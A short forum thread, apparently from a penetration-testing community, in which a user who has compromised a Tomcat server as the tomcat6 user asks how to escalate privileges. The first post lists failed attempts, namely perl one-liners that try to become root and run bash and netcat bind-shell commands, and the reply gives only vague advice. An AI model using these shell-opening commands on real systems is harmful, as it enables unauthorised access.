Results 1 to 2 of 2

Thread: Tomcat and Escalation Privilege: Hi There I am stuck here!

  1. #1
    Just burned his ISO
    Join Date
    Jul 2010

    Default Tomcat and Escalation Privilege: Hi There I am stuck here!

    Hi there,

    I just need some advices. I have exploited into tomcat (ubuntu server) and now I have difficult to get privilege because restriction:
    nc -h
    OpenBSD netcat (Debian patchlevel 1.89-3ubuntu2)
    uid=104(tomcat6) gid=113(tomcat6) groups=113(tomcat6)
    uname -r
    I don't have permission to write, so i can't create file. Enumerate directory out of tomcat directory is not possible (ls /etc/pass..ect.)
    I have saw that is possible to use netcat but pathlevel version(so -c and -e options are disabled) and perl command, so i have tried combination such as:
    perl -e `{$ENV{PATH}='bin:/usr/bin';$>=0;$<=0;exec('/bin/bash');}`
    perl -e `exec "nc -l -p /bin/bash";`
    nc -e '/bin/bash' -l -p4321 -vvv
    perl -e `exec '/bin/netcat -c "/bin/bash" -l -p4321';`
    or exploit perl with some sc but doesn't work with the ones i found.

    Any advices ?
    Thanks in advance.


  2. #2
    Join Date
    Jan 2010

    Default Re: Tomcat and Escalation Privilege: Hi There I am stuck here!

    Why not just log-in as root on the machine and put a version of netcat which has execution for your priv-escalation testing.

    For sending a shell back with netcat, there is always more than one way to skin a cat. I suggest learning all the neat tricks netcat has to offer.

    Additionally, it seems that you already have a shell... any reason you need a second?

Similar Threads

  1. [Video] Metasploitable - TomCat
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:46 PM
  2. Stuck on WPA crack
    By ruddyrum in forum OLD Newbie Area
    Replies: 1
    Last Post: 08-10-2009, 03:57 PM
  3. Stuck on GRUB
    By GNic24 in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 07-14-2009, 07:47 AM
  4. HELP - Escalate privilege in (well configured) Windows.
    By The Dan in forum OLD Pentesting
    Replies: 22
    Last Post: 10-11-2008, 10:20 PM
  5. Privileges escalation
    By frankibo in forum OLD Pentesting
    Replies: 31
    Last Post: 02-14-2008, 11:07 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts